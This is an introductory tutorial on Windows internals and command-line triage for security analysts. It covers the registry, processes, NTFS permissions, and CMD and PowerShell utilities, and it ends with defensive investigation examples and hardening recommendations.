Windows Basics: Essential Architecture and Command Line Skills for Cyber Security Analysts

The Windows operating system is a highly structured, layered environment designed to balance performance, hardware compatibility, and security. At a high level, the architecture is divided into two primary operational states: User Mode and Kernel Mode. This separation is crucial for maintaining system stability and preventing malicious or buggy software from crashing the entire machine.

User Mode vs. Kernel Mode

User Mode: The vast majority of the applications you interact with on a daily basis (web browsers, word processors, games, and even many administrative tools) run in User Mode. When an application runs in User Mode, it is heavily restricted. It does not have direct access to the underlying hardware (like the CPU, RAM, or hard drive) or critical system data structures. Instead, it operates within its own isolated, private virtual address space. If a User Mode application crashes, only that specific application is affected; the rest of the operating system continues to function normally.

Kernel Mode: In stark contrast, Kernel Mode represents the absolute heart of the operating system. Code running in Kernel Mode has unrestricted, direct access to the system's hardware and all computer memory. The core operating system components, hardware drivers, and critical security mechanisms reside here. Because of this unrestricted access, a crash or a bug in Kernel Mode typically results in a total system failure, commonly known as the Blue Screen of Death (BSOD).

For cybersecurity analysts, understanding this divide is paramount. Modern malware frequently attempts to elevate its privileges to execute code in Kernel Mode (often via vulnerable drivers), granting the attacker total control over the machine and the ability to hide from security software operating in User Mode.

The Windows Registry

If the Kernel is the heart of Windows, the Registry is its central nervous system. The Windows Registry is a massive, hierarchical database that stores low-level settings for the operating system and for applications that opt to use the registry. It contains information regarding hardware configuration, installed software, user preferences, security policies, and system startup processes.

The Registry is structured into "Hives," with the most critical for analysts being:

• HKEY_LOCAL_MACHINE (HKLM): Contains settings specific to the local computer, regardless of which user is logged in.
• HKEY_CURRENT_USER (HKCU): Contains settings specific to the currently logged-in user.

Cybercriminals heavily abuse the Registry. A common tactic for establishing persistence (ensuring malware survives a system reboot) is to create malicious entries in the "Run" or "RunOnce" registry keys within HKLM or HKCU, forcing the operating system to execute the malware every time it starts.

Processes, Threads, and Services

Understanding how Windows executes code is fundamental to analyzing system behavior.

• Processes: A process is an instance of a running executable program. It acts as a container, holding the memory space, security context, and resources required to execute the program.
• Threads: A thread is the basic unit of execution within a process. A single process can have multiple threads running concurrently, allowing for multitasking within the application.
• Services: Windows Services are specialized, long-running executable applications that operate in the background. They do not have a user interface and often start automatically when the computer boots, regardless of whether a user logs in. Many core OS functions (like the Windows Update service or the Event Log service) and third-party security agents run as services. Attackers frequently disguise their malware as legitimate Windows Services to evade detection.

The File System (NTFS) and Permissions

Modern Windows systems utilize the New Technology File System (NTFS). Beyond basic file storage, NTFS provides robust security features, most notably Access Control Lists (ACLs).

Every file and folder in NTFS has an associated ACL that explicitly defines which users or groups are permitted to perform specific actions (Read, Write, Execute, Modify, Full Control). Cybersecurity analysts must thoroughly understand NTFS permissions to identify privilege escalation vulnerabilities (e.g., a low-privileged user having write access to a directory containing a critical system executable) or to secure sensitive data. Alternate Data Streams (ADS) are another NTFS feature that attackers sometimes use to hide malicious payloads behind legitimate files without altering the visible file size.

While the Windows Graphical User Interface (GUI) is intuitive, true cybersecurity analysis demands proficiency in the command line. The command line provides speed, automation capabilities, and access to low-level system information that the GUI often obscures. Windows offers two primary command-line interpreters: the legacy Command Prompt (CMD) and the incredibly powerful PowerShell.

Critical CMD Utilities

For decades, CMD has been the standard shell. While older, its built-in utilities remain indispensable for rapid system triage.

• ipconfig: Used to view the current TCP/IP network configuration values (IP address, Subnet Mask, Default Gateway). Analysts use this to understand a machine's position within a network.
• netstat: A crucial tool for displaying active TCP connections, listening ports, and Ethernet statistics. netstat -ano is frequently used to identify which specific process (via the Process ID or PID) is communicating over the network, helping to spot anomalous outgoing connections to command-and-control servers.
• tasklist and taskkill: tasklist displays a list of currently running processes on a local or remote machine. taskkill is used to forcefully terminate processes by PID or image name.
• systeminfo: Provides a comprehensive overview of the system's hardware and software configuration, including the OS version, architecture, and, crucially, the list of installed security hotfixes. Attackers check this to identify unpatched vulnerabilities.
• whoami: Displays user, group, and privileges information for the currently logged-on user. whoami /priv is vital for identifying if the current user possesses special privileges (like SeDebugPrivilege or SeImpersonatePrivilege) that could be exploited for privilege escalation.
• net user and net localgroup: Used to manage user accounts and groups on the local machine. Analysts use these commands to hunt for newly created, unauthorized administrative accounts.

The Power of PowerShell

PowerShell is an advanced task automation and configuration management framework. Unlike CMD, which manipulates text, PowerShell is built on the .NET framework and manipulates objects. This makes it exponentially more powerful and a favorite tool for both system administrators and Advanced Persistent Threat (APT) groups.

• Get-Process: Similar to tasklist, but returns objects with rich properties. You can easily filter and sort processes based on CPU usage, memory consumption, or specific properties.
• Get-Service: Used to enumerate the status of services on a local or remote computer.
• Get-EventLog / Get-WinEvent: These commands are essential for parsing the Windows Event Logs. Analysts use them to hunt for specific Event IDs associated with malicious activity, such as failed logon attempts (Event ID 4625) or newly created services (Event ID 7045).
• Invoke-WebRequest: Used to send HTTP/HTTPS requests to a web page or web service. Attackers often use this (or its alias curl in PowerShell) to download malicious payloads from remote servers directly into memory, bypassing disk-based antivirus detection.

Example 1: Identifying a Malicious Process A SOC analyst receives an alert regarding suspicious outbound network traffic from a workstation. The analyst connects to the machine and opens an administrative command prompt. They execute netstat -ano | findstr ESTABLISHED. They notice an unfamiliar IP address communicating over port 443. They note the associated PID (e.g., 4052). They then run tasklist | findstr 4052 and discover the process is named svchost.exe. While svchost.exe is a legitimate Windows process, it should rarely initiate outbound connections to random external IPs. The analyst realizes this is likely malware masquerading as a legitimate system process and proceeds to isolate the machine for forensic analysis.

Example 2: Discovering Persistence Mechanisms An Incident Responder is investigating a compromised server. They suspect the attacker has established persistence. The responder uses PowerShell to query common registry run keys: Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run They spot an entry named "WindowsUpdater" pointing to an executable located in C:\Users\Public\Appdata\Local\Temp\update.exe. Recognizing that legitimate system updates do not execute from public temporary directories, they immediately identify this as the attacker's persistence mechanism.

Securing a Windows environment requires a proactive approach centered on the Principle of Least Privilege and rigorous monitoring.

1. Implement the Principle of Least Privilege (PoLP): Users should only be granted the minimum privileges necessary to perform their job functions. No user should operate a machine with local Administrator rights for daily tasks. This significantly limits the damage malware can cause if a system is compromised.
2. Harden the Registry and File System: Utilize Group Policy Objects (GPOs) to restrict access to critical registry keys and enforce strict NTFS permissions on sensitive directories. Ensure that standard users cannot write to directories within C:\Windows or C:\Program Files.
3. Enable Advanced Auditing: The default Windows logging configuration is often insufficient for robust incident response. Organizations must enable advanced audit policies, specifically tracking process creation (Event ID 4688) with command-line arguments enabled, and monitoring critical registry changes.
4. Monitor PowerShell Execution: PowerShell's power makes it a prime target for abuse. Enable PowerShell Script Block Logging (Event ID 4104) to capture the full content of executed scripts, even if they are obfuscated. Monitor for the use of "encoded commands" (the -e or -EncodedCommand flags), which are frequently used by attackers to hide their activity.
5. Application Whitelisting: Implement solutions like Windows Defender Application Control (WDAC) or AppLocker to ensure that only explicitly approved executables and scripts are permitted to run on endpoints, blocking unapproved software by default.